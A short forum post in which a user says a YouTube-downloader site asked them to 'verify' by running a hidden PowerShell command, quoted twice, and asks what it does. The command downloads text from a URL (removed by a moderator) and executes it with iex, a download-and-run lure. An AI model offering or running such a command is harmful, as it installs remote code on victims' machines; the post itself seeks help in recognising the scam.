MgicalaEarner
Elite Member
- Jul 8, 2017
- 3,749
- 4,871
I was downloading YouTube video and told me to verify like this to proceed.
powershell.exe -W Hidden -command $uR='***Link removed by a Moderator***';$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
Can someone explain what is this?
powershell.exe -W Hidden -command $uR='***Link removed by a Moderator***';$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
Can someone explain what is this?
Last edited by a moderator: